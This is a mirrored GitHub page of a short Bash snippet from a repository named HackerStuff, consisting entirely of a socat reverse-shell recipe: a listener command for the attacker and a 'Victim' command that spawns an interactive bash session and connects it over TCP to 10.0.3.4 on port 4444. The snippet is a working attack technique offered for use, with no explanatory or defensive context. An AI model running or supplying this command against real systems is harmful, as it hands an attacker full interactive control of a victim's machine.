mirror of
https://github.com/0xdade/HackerStuff.git
synced 2025-10-29 16:59:27 +00:00
6 lines
137 B
Bash
6 lines
137 B
Bash
#Listener:
|
|
socat file:`tty`,raw,echo=0 tcp-listen:4444
|
|
|
|
#Victim:
|
|
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
|